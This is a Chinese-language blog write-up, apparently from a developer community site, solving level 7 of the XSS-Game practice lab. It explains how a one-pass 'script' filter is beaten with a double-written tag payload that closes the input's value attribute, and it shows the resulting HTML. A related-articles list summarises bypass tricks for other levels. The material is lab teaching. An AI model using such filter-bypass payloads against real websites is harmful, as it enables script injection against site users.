XSS-Game level 7

简介: 第七关过滤了 script , 但未过滤尖括号 '<','>' , 使用双写绕过

第七关过滤了 script , 但未过滤尖括号 '<','>' , 使用双写绕过


image.png



源码中过滤了大小写 , script , 以及一些属性 , 并将参数拼接到 value 值



image.png



使用 htmlspecialchars() 过滤标签 , 但未重新赋值给 $str , 所以不会产生影响

image.png

此关卡为过滤尖括号 , 并且只过滤了一遍 script , 我们使用双写绕过 payload

"><scscriptript>alert(7)</scscriptript>

左侧双引号用来闭合 value属性的左双引号 , 左侧尖括号 > 用来闭合input标签

<input name=keyword  value="'.$str6.'">    //拼接前
<input name=keyword  value=""> <scscriptript>alert(7)</scscriptript>"> //拼接后
<input name=keyword  value=""> <script>alert(7)</script>">    //过滤后

过关

image.png


相关文章
|
11月前
Pingdom Website Speed Test
在Pingdom输入 URL 地址,即可测试页面加载速度,分析并找出性能瓶颈。帮助用户找出影响网站速度的原因,并给出改善网页性能的可行性方案,很适合做网站的用户。
41 0
|
编解码 并行计算
wrf--运行real.exe时报错:“Could not find level above ground“ error
在修改wrf初始场资料时,如果做了带通滤波处理,会发现在运行real.exe时报错:“Could not find level above ground” error 。
wrf--运行real.exe时报错:“Could not find level above ground“ error
XSS-Game level 8
第八关过滤的很严 , 只能编码绕过了
107 0
XSS-Game level 8
XSS-Game level 11
第十一关通过 Referer , 利用事件绕过
XSS-Game level 11
XSS-Game level 13
第十三关利用 COOKIE 使用 事件绕过
105 0
XSS-Game level 13
|
JavaScript 前端开发
XSS-Game Level1
第一关算是送分题 , 没有任何过滤 , 传递一个弹窗的JS脚本即可
193 0
XSS-Game Level1
|
JavaScript
XSS-Game Level 2
第二关将结果拼接到了value属性中 , 我们插入JS脚本时手动闭合双引号即可
103 0
XSS-Game Level 2
XSS-Game level 5
第五关过滤了 <script> 和 on 事件 , 使用 a 标签绕过
108 0
XSS-Game level 5
XSS-Game level 12
第十二关利用 HTTP_USER_AGENT 通过点击事件绕过
119 0
XSS-Game level 12
XSS-Game level 10
第十关过滤了尖括号 > < , 并且隐藏了输入框 , 使用事件绕过,并使输入框取消隐藏
XSS-Game level 10